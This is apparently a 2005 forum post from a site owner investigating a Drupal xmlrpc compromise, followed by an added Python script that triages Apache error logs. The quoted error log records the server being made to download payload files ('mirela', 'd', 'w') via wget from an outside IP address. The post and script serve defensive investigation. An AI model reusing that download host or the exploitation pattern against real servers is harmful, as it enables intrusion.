After googling the web, I found something called modsecurity for Apache. It's a web application firewall.
I installed and configured it, and it looks like the problem occurred because I didn't update my Drupal.
Here is one of the entries in my logfile from modsecurity:
Quote:
==09758743==============================
Request: www.mydomain.com ##.##.###.### - - [23/Dec/2005:22:56:56 --0500] "POST /xmlrpc.php HTTP/1.1" 412 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 " H@188cCoAGUAAD1eAxsAAAAJ "-"
Handler: php5-script
----------------------------------------
POST /xmlrpc.php HTTP/1.1
Host: ##.##.###.###
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1
Content-Type: text/xml
Content-Length: 269
mod_security-message: Access denied with code 412. Pattern match "<(.|\\n)+>" at POST_PAYLOAD
mod_security-action: 412
269
HTTP/1.1 412 Precondition Failed
Content-Length: 323
Content-Type: text/html; charset=iso-8859-1
--09758743--
Is this an HTML/JavaScript injection attack? (whatever that is)
Also, after carefully looking at my Apache error log, here is the part where things went wrong:
Quote:
[Tue Dec 20 08:48:43 2005] [error] [client 216.138.244.145] script not found or unable to stat: /var/www/cgi-bin/awstats
[client 216.138.244.145] script '/var/www/html/xmlrpc.php' not found or unable to stat
[client 216.138.244.145] PHP Warning: Unterminated comment starting line 1 in /var/www/html/blog/includes/xmlrpcs.inc(249) : eval()'d code on line 1
--08:48:47-- http://209.136.48.69/mirela
=> `mirela'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 94 [text/plain]
0K 100% 3.90 MB/s
08:48:47 (3.90 MB/s) - `mirela' saved [94/94]
--08:48:47-- http://209.136.48.69/d
=> `d'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 469,240 (458K) [text/plain]
0K ...[Tue Dec 20 08:48:48 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/blog/xmlsrv
....... ...[Tue Dec 20 08:48:49 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/blogs
....... ..[Tue Dec 20 08:48:50 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/drupal
.......[Tue Dec 20 08:48:52 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/phpgroupware
. ......[Tue Dec 20 08:48:53 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/wordpress
..[client 216.138.244.145] script '/var/www/html/xmlrpc.php' not found or unable to stat
.. .......... 10% 6.81 KB/s
50K ...[Tue Dec 20 08:48:55 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/xmlrpc
.......[Tue Dec 20 08:48:56 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/xmlsrv
.......... .......... .......... .......... 21% 6.95 KB/s
100K .......... .......... .......... .......... .......... 32% 6.94 KB/s
150K .......... .......... .......... .......... .......... 43% 7.11 KB/s
200K .......... .......... .......... .......... .......... 54% 7.17 KB/s
250K .......... .......... .......... .......... .......... 65% 7.60 KB/s
300K .......... .......... .......... .......... .......... 76% 8.67 KB/s
350K .......... .......... .......... .......... .......... 87% 14.05 KB/s
400K .......... .......... .......... .......... .......... 98% 13.90 KB/s
450K ........ 100% 19.13 KB/s
08:49:43 (8.23 KB/s) - `d' saved [469240/469240]
--08:49:43-- http://209.136.48.69/w
=> `w'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34,913 (34K) [text/plain]
0K .......... .......... .......... .... 100% 16.89 KB/s
08:49:45 (16.89 KB/s) - `w' saved [34913/34913]
Now I have modsecurity installed.
Block the attacker IP (although they can always use another IP to attack me again).
Hm.. what else should I do next?

Btw, thanks for all your replies.
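
Added example (not part of the original post): a small Python triage script for an error log like the one quoted above, where wget's transcript appears inside Apache's error log because the stderr of a process started under the web server ends up there. It lists the fetched URLs and saved file names to hunt for on disk, the PHP files raising eval()'d-code warnings, and the clients probing for missing scripts; the function name `triage` and the report keys are assumptions, and the sample lines are taken from the post's log excerpt.

```python
import re

# Sample input: lines excerpted from the error log quoted in the post above.
SAMPLE_LOG = """\
[Tue Dec 20 08:48:43 2005] [error] [client 216.138.244.145] script not found or unable to stat: /var/www/cgi-bin/awstats
[client 216.138.244.145] PHP Warning: Unterminated comment starting line 1 in /var/www/html/blog/includes/xmlrpcs.inc(249) : eval()'d code on line 1
--08:48:47-- http://209.136.48.69/mirela
=> `mirela'
08:48:47 (3.90 MB/s) - `mirela' saved [94/94]
--08:48:47-- http://209.136.48.69/d
=> `d'
0K ...[Tue Dec 20 08:48:48 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/blog/xmlsrv
08:49:43 (8.23 KB/s) - `d' saved [469240/469240]
"""

# wget transcript lines: they should never appear in a web server error log.
WGET_START = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)")
WGET_SAVED = re.compile(r"`([^']+)' saved \[(\d+)/(\d+)\]")
# PHP message raised from inside eval(): names the file whose eval() ran the input.
EVAL_WARN = re.compile(r"PHP (?:Warning|Notice|Parse error).*?in (\S+?)\(\d+\) : eval\(\)'d code")
# Requests for paths that do not exist (scanner probing for known scripts).
PROBE = re.compile(r"\[client ([\d.]+)\] (?:File does not exist|script .*not found or unable to stat)")

def triage(text):
    """Return indicators worth following up on from an Apache error log."""
    report = {"downloads": [], "saved": [], "eval_files": set(), "probing_clients": {}}
    for line in text.splitlines():
        m = WGET_START.match(line)
        if m:
            report["downloads"].append(m.group(1))
        m = WGET_SAVED.search(line)
        if m:  # file name and size to search for on disk (/tmp, web root, ...)
            report["saved"].append((m.group(1), int(m.group(2))))
        m = EVAL_WARN.search(line)
        if m:
            report["eval_files"].add(m.group(1))
        # search(), not match(): wget progress dots can prefix an Apache entry
        m = PROBE.search(line)
        if m:
            clients = report["probing_clients"]
            clients[m.group(1)] = clients.get(m.group(1), 0) + 1
    return report

if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(key, "->", value)
```

Any entry under `downloads` or `saved` means a command ran as the web server user, so the host should be treated as compromised and the saved files located and examined, not just the source IP blocked.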
